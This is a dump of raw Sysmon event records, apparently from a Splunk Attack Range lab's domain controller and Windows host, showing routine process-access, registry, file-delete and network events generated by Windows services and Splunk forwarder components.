12:22:21.428{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2086574637F2D2AE43A2D4654184FF43,SHA256=8DB6063AB6D4FB935521A5853CD21B488358BB8E0B577972E45D4DEF8B73ED51,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439922Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:21.090{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439921Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:21.090{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x8000000000000000439920Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:22:21.046{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000439919Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:22:21.046{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x04b0e68a) 13241300x8000000000000000439918Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:22:21.046{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d73b57-0x961642bd) 13241300x8000000000000000439917Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:22:21.046{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d73b5f-0xf7daaabd) 13241300x8000000000000000439916Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:22:21.046{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d73b68-0x599f12bd) 13241300x8000000000000000439915Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:22:21.046{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000439914Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:22:21.046{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x04b0e68a) 13241300x8000000000000000439913Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:22:21.046{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d73b57-0x961642bd) 13241300x8000000000000000439912Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:22:21.046{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d73b5f-0xf7daaabd) 13241300x8000000000000000439911Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:22:21.046{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d73b68-0x599f12bd) 10341000x8000000000000000291228Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:22.651{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-01FE-6088-EE29-00000000BB01}4492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291227Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:22.651{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291226Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:22.651{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291225Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:22.651{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291224Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:22.651{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291223Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:22.651{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291222Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:22.651{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291221Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:22.651{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291220Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:22.651{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291219Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:22.651{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291218Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:22.650{BEA10069-D0C1-6086-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{BEA10069-01FE-6088-EE29-00000000BB01}4492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291217Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:22.650{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-01FE-6088-EE29-00000000BB01}4492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291216Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:22.646{BEA10069-01FE-6088-EE29-00000000BB01}4492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000291215Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:22.582{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15A04EBFEDF4FA240984CC4D526F51A6,SHA256=050F8CB11B89E5DAC429256F183B58D99AE9283FCCD78684E06C1B2465F9AFE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439931Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:22.948{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2DCE18404126727D0D7A1B6B434C1D15,SHA256=3CD671CE961C5522B15E171C85C65AC4F3CB259E5187CD7FED1F9240B27DF601,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439930Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:22.556{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE74EA67D59E0DDA5619BE61AA9A161C,SHA256=D650B801C56BBB563701CE1F3FC282A3F446E15FD007BBB55F56C3D7B051A1B8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439929Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:22.091{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439928Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:22.091{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291214Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:22.212{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=415948183D140A461C956E7320C79001,SHA256=8C0D3BD76A120C0D3F34466F34A8648E767640710028171E2AFB2897B0548283,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291213Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:20.390{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50602-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x8000000000000000439935Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:20.387{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62382-false10.0.1.12-8089- 23542300x8000000000000000439934Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:23.565{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=165173A6B18A0FC9250CBEBC8B4169F7,SHA256=F388B4A43BC030FB69C247CC5E3A2E4BEB12EF1600A8BE57A5292EF3B0D9937D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291244Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:23.785{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=16641BE6B897620D847BE70BBB7D3A36,SHA256=A69AEF24E5770B92F1BE3538AAF85C9A79E611BEE938B3E76697FB8B30863F1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291243Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:23.748{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7CB978C1B650732079CEACE80A0E1AB,SHA256=29334C0988A9B34B61CC353FFB39D989C460114CA7070BFB10769E339AF5978D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291242Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:23.469{BEA10069-01FF-6088-EF29-00000000BB01}50046160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291241Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:23.331{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-01FF-6088-EF29-00000000BB01}5004C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291240Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:23.331{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 